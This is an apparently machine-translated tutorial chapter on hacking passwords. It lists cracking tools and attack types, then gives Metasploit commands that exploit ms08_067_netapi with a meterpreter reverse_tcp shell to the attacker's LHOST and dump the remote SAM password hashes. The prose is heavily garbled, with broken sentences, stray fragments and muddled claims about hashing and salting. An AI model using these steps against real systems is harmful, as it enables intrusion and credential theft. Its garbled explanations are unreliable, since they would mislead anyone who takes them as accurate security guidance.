Hacking Password - 17

Password is one of the most common targets of hackers because password hackers are one of the most common targets. The simplest technique, Although most people think that creating longer passwords is difficult to crack, Hackers realize that most people usually neglect to protect their user credentials.

Confidential login information (such as passwords) is one of the weakest links in technical security Because it is this security function that only depends on confidentiality. Once this secret is leaked out, all the responsibilities are The windows and the system are easily damaged.

If you enter the attacker’s mind directly, you may realize that there are many ways to understand what an attacker is The user's password is because it has too many loopholes. Relying solely on the biggest problem for security, the password is usually the user provides his user information to other users good. Although the user may reveal his password intentionally or unintentionally, once this password is leaked, You have no way to know who else knows what it is. At this point, it’s important to know when Someone knows what the user’s password is, which does not make that person an authorized user on the network.

How to Crack Passwords

If hackers cannot pass reasoning, social engineering, and Physical attack (discussed in detail in later chapters), they can use several password cracking instead

Tools, such as:

1. Cain & Abel – Used to crack NT and LM (NTLM) LanManager hashes, Pic and Cisco IOS hashes, Radius hash value, and Windows RDP password.

2. Elcomsoft Distributed Password Recovery-Crack PKCS, Microsoft Office, and PGP password. It can also be used to crack distributed passwords and restore 10000 Networked computers. It also utilizes GPU accelerators, which can increase its cracking The speed is up to 50 times.

3. Elcomsoft System Recovery-reset Windows password, reset all password expiration time and Set up administrative credentials.

4. John the Ripper-Cracking Windows, Unix, and Linux hashed passwords

5. Ophcrack-use rainbow table to crack Windows password

6. Pandora – Crack offline or online user passwords of Novell Netware accounts

7. Active system password recovery-recover any password stored locally in Windows operating system. This includes login passwords, VPN, RAS, SYSKEY, and even WEP or WPA connect.

8. RainbowCrack-Use rainbow tables to crack MD5 and LanManager hashes.

Please note that some of these tools may require physical access to the system you want to access hackers. Again, remember that once a hacker has physical access to the system you intend to access Protection, he will be able to mine all password-protected or encrypted files you own, as long as have the right tools.

When testing a password cracking strategy, one of the most important things you need to do is Remember that the technology you need to test will be based on the encryption type You need to crack the password. In addition, if you are testing a password cracking hacker, you may also need Please keep in mind that some systems may lock out the relevant user, which may result in rejection Provide services to users who use the Internet.

Notes on Password Encryption

After the password is created, it will be encrypted using a one-way hash algorithm. These hashes Then treat the password as an encrypted string. For obvious reasons, the hash created is not Reversible, which makes the password impossible to decrypt. If you try to crack the password on Linux Operating system, this increases the difficulty because it increases The randomness of the password because the operating system adds a "salt", or a random value to make the password It is more unique and prevents two users from obtaining the same hash value.

However, if you have the right tools, you can launch different types of attacks to try to recover or break the code. Here are some of them:

1. Dictionary attack

As the name suggests, these attacks use words available in the dictionary to counter The password database of the system. This type of attack makes it easy to find weaknesses in Password or use alternative spelling passwords, such as pa$$word replace "password". The strengths of dictionary attack tools are based on the vocabulary It contains.

2. Brute Force Attack

These attacks can crack any type of password because it exploits Letters, special characters, and numbers until the device password is successfully cracked. However, it is easy to guess the flaws of this technology-finding the problem may take a lot of time. Passwords, especially strong passwords.

3. Rainbow Attack

Rainbow attacks are very suitable for cracking hashed passwords. These types of attacks can lead to The success rate is higher. Using rainbow attack tools can also crack the password faster, Compared with dictionaries and brute force attack tools. The only flaw in this attack is Only passwords with no more than 14 characters can be found.

Other Ways to Uncover Passwords

As mentioned earlier, the easiest way to crack the password is to physically access the system you want to use. Attempting to crack. If you cannot use the cracking tool on your system, you can use the following methods Technology instead:

1. Keystroke logging

This can easily become one of the most effective techniques in password cracking because it uses A recording device that records keystrokes typed in the keyboard. You can use one Keylogger software, such as KeyLogger Stealth and Spector Pro, or keylogger

Hardware such as KeyGhost.

2. Search for weak password storage

Too many applications in most computers store passwords locally, which makes They are vulnerable to hacker attacks. Once you have physical access to the computer, you can easily find Find out the password by simply searching for storage vulnerabilities or using text search. If you, Fortunately, you can even find the stored password on the app itself.

3. Weak BIOS password

Many computers allow users to use a power-on password to protect the hardware Settings are located in its CMOS chip. However, you can easily reset these passwords by Just replace a single jumper on the motherboard or unplug the CMOS battery from the motherboard

board. You can also try your luck and search online for different default user login credentials The type of online motherboard.

4. Obtain the password remotely

If you cannot physically access the system or its location, you can still get locally stored The password on the system running on the Windows operating system from a remote location, or even obtain The credentials of the system administrator account. You can do this by performing a spoofing attack first, Then follow the steps below to use the SAM file in the registry file of the target computer

pace:

1. Pull up Metasploit and enter the following command: msf> use

Use /windows/smb/ms08_067_netapi

2. Next, enter the following command: msf (ms08_067_netapi)> set payload/windows/meterpreter/reverse_tcp

After doing this, Metaploit will tell you that you need to have the IP address of the target

(RHOST) and the IP address of the device you are using (LHOST). If you have those

For more information, you can use the following command to set the IP address

Development:

msf (ms08_067_netapi)> set RHOST [target IP address]

msf (ms08_067_netapi)> set LHOST [your IP address]

3. Now, execute the exploit by typing the following command:

msf (ms08_067_netapi)> exploit

This will give you a terminal prompt, allowing you to access the target computer

Remotely.

4. Get password hash

Since most operating systems and applications tend to store passwords in hashed form For encryption purposes, you may not be able to see the user credentials you want immediately. However, you can obtain these hash values ​​and explain them later. catch To hash, use this command:

Meterpreter> Hash Dump

After entering, you will see all the users on the system you are hacking, as well as the hashed

password. Then, you can try to decrypt these hashes using tools such as Cain & Abel.